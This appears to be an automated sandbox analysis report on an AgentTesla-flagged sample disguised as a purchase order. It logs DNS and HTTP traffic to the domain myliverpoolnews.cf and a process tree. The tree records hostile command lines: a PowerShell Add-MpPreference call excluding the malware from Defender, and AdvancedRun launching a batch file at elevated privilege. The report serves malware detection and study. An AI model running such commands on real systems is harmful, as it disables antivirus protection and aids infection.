Apr 8, 2021 12:24:48.868444920 CEST | 50713 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:24:48.887140036 CEST | 53 | 50713 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:25:10.328861952 CEST | 56132 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:25:10.354651928 CEST | 53 | 56132 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:25:37.976799965 CEST | 58987 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:25:38.001267910 CEST | 53 | 58987 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:25:39.255680084 CEST | 56579 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:25:39.273714066 CEST | 53 | 56579 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:26:15.222662926 CEST | 60633 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:26:15.235543966 CEST | 53 | 60633 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:26:19.379484892 CEST | 61292 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:26:19.405441046 CEST | 53 | 61292 | 8.8.8.8 | 192.168.2.3

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 8, 2021 12:23:50.030350924 CEST | 192.168.2.3 | 8.8.8.8 | 0xa3c7 | Standard query (0) | myliverpoolnews.cf | A (IP address) | IN (0x0001)
Apr 8, 2021 12:23:50.210664988 CEST | 192.168.2.3 | 8.8.8.8 | 0x5299 | Standard query (0) | myliverpoolnews.cf | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 8, 2021 12:23:50.051722050 CEST | 8.8.8.8 | 192.168.2.3 | 0xa3c7 | No error (0) | myliverpoolnews.cf | | 172.67.150.212 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:23:50.051722050 CEST | 8.8.8.8 | 192.168.2.3 | 0xa3c7 | No error (0) | myliverpoolnews.cf | | 104.21.56.119 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:23:50.224140882 CEST | 8.8.8.8 | 192.168.2.3 | 0x5299 | No error (0) | myliverpoolnews.cf | | 172.67.150.212 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:23:50.224140882 CEST | 8.8.8.8 | 192.168.2.3 | 0x5299 | No error (0) | myliverpoolnews.cf | | 104.21.56.119 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• myliverpoolnews.cf

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49703 | 172.67.150.212 | 80 | C:\Users\user\Desktop\08042021New-PurchaseOrder.exe

Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 12:23:50.103962898 CEST | 940 | OUT | GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E349A863A698863617D7B55886FAE832.html HTTP/1.1
UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
Host: myliverpoolnews.cf
Connection: Keep-Alive
Apr 8, 2021 12:23:50.195653915 CEST | 941 | IN | HTTP/1.1 301 Moved Permanently
Date: Thu, 08 Apr 2021 10:23:50 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Thu, 08 Apr 2021 11:23:50 GMT
Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E349A863A698863617D7B55886FAE832.html
cf-request-id: 09529b876d0000cdbfa7195000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=WCJBx8hERcJIAqHjl%2Bi8%2BixsL9oG4CObGFRIAoVqdbePV4nx8DfVuek8YYN8SziI5qEOSLCyX4JYtrDljLVgQqw%2FznHF1ds89Rzlfhu7nohq7aA%3D"}],"max_age":604800,"group":"cf-nel"}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 63cac852499dcdbf-CDG
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Apr 8, 2021 12:23:51.299626112 CEST | 2253 | OUT | GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-ADD8B69CFB72A4D5DBAFC5A0A255FA77.html HTTP/1.1
UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
Host: myliverpoolnews.cf
Apr 8, 2021 12:23:51.334906101 CEST | 2253 | IN | HTTP/1.1 301 Moved Permanently
Date: Thu, 08 Apr 2021 10:23:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Thu, 08 Apr 2021 11:23:51 GMT
Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-ADD8B69CFB72A4D5DBAFC5A0A255FA77.html
cf-request-id: 09529b8c150000cdbfcc8fa000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=aLEY%2BEnS4BG4xv12NRCilWDALqZwCYuNniwo1v6CysW6ZLzxo7KbvzB4aBAkdzqzDjpRGzsqpqtIzqJal3d45%2F6qBY4R59n5RxOxfTPQ8Cp4TLY%3D"}],"max_age":604800,"group":"cf-nel"}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 63cac859bfe2cdbf-CDG
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Apr 8, 2021 12:23:56.045954943 CEST | 3572 | OUT | GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5183A347C7BAD04E3424599E1B978F29.html HTTP/1.1
UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
Host: myliverpoolnews.cf
Apr 8, 2021 12:23:56.079735041 CEST | 3573 | IN | HTTP/1.1 301 Moved Permanently
Date: Thu, 08 Apr 2021 10:23:56 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Thu, 08 Apr 2021 11:23:56 GMT
Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5183A347C7BAD04E3424599E1B978F29.html
cf-request-id: 09529b9e9f0000cdbf9fbfa000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=97Le03BnatOCgR4SbWMWmhHMLzkEP16zTn7mEoWV1jeHIkiq1rtG6w8rZxl4YhJbqWEai4KACNehTkeiUeMcEynI5e%2BRPIy3hT8qpxRkfg%2FZ%2FhM%3D"}],"max_age":604800,"group":"cf-nel"}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 63cac877697ecdbf-CDG
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Apr 8, 2021 12:23:50.351607084 CEST | 172.67.150.212 | 443 | 192.168.2.3 | 49704 | CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Wed Mar 31 02:00:00 CEST 2021 | Thu Mar 31 01:59:59 CEST 2022 | 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0 | 54328bd36c14bd82ddaa0c04b25ed9ad
(intermediate certificate of the same chain) | | | | | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Mon Jan 27 13:48:08 CET 2020 | Wed Jan 01 00:59:59 CET 2025 | |

                                                                                    Code Manipulations

                                                                                    Statistics

                                                                                    Behavior

System Behavior

General

Start time: 12:23:48
Start date: 08/04/2021
Path: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe'
Imagebase: 0x140000
File size: 32008 bytes
MD5 hash: 27233176A2A979195B01A53EC16C7631
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.291099995.0000000003543000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 12:24:02
Start date: 08/04/2021
Path: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Imagebase: 0x400000
File size: 91000 bytes
MD5 hash: 17FC12902F4769AF3A9271EB4E2DACCE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 3%, Metadefender
• Detection: 0%, ReversingLabs
Reputation: moderate

General

Start time: 12:24:06
Start date: 08/04/2021
Path: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /SpecialRun 4101d8 4436
Imagebase: 0x400000
                                                                                    File size:91000 bytes
                                                                                    MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate

                                                                                    General

                                                                                    Start time:12:24:11
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                                                                                    Imagebase:0x100000
                                                                                    File size:430592 bytes
                                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Reputation:high

                                                                                    General

                                                                                    Start time:12:24:12
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6b2800000
                                                                                    File size:625664 bytes
                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    General

                                                                                    Start time:12:24:12
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                                                                                    Imagebase:0x100000
                                                                                    File size:430592 bytes
                                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Reputation:high

                                                                                    General

                                                                                    Start time:12:24:12
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6b2800000
                                                                                    File size:625664 bytes
                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    General

                                                                                    Start time:12:24:12
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                                                    Imagebase:0xd10000
                                                                                    File size:232960 bytes
                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    General

                                                                                    Start time:12:24:18
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6b2800000
                                                                                    File size:625664 bytes
                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    General

                                                                                    Start time:12:24:18
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:timeout 1
                                                                                    Imagebase:0x1220000
                                                                                    File size:26112 bytes
                                                                                    MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    General

                                                                                    Start time:12:24:22
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    Imagebase:0xfa0000
                                                                                    File size:32008 bytes
                                                                                    MD5 hash:27233176A2A979195B01A53EC16C7631
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Reputation:low

                                                                                    General

                                                                                    Start time:12:24:24
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 2784
                                                                                    Imagebase:0x1320000
                                                                                    File size:434592 bytes
                                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Reputation:high

                                                                                    General

                                                                                    Start time:12:24:56
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe'
                                                                                    Imagebase:0x810000
                                                                                    File size:32008 bytes
                                                                                    MD5 hash:27233176A2A979195B01A53EC16C7631
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.486317190.0000000006341000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.487748726.000000000645C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 15%, ReversingLabs
                                                                                    Reputation:low

                                                                                    General

                                                                                    Start time:12:25:05
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe'
                                                                                    Imagebase:0xdf0000
                                                                                    File size:32008 bytes
                                                                                    MD5 hash:27233176A2A979195B01A53EC16C7631
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Reputation:low

                                                                                    General

                                                                                    Start time:12:25:10
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                    Imagebase:0x400000
                                                                                    File size:91000 bytes
                                                                                    MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 3%, Metadefender, Browse
                                                                                    • Detection: 0%, ReversingLabs
                                                                                    Reputation:moderate

                                                                                    General

                                                                                    Start time:12:25:25
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                    Imagebase:0x400000
                                                                                    File size:91000 bytes
                                                                                    MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 3%, Metadefender, Browse
                                                                                    • Detection: 0%, ReversingLabs

                                                                                    General

                                                                                    Start time:12:25:30
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /SpecialRun 4101d8 5204
                                                                                    Imagebase:0x400000
                                                                                    File size:91000 bytes
                                                                                    MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language

Disassembly

Code Analysis
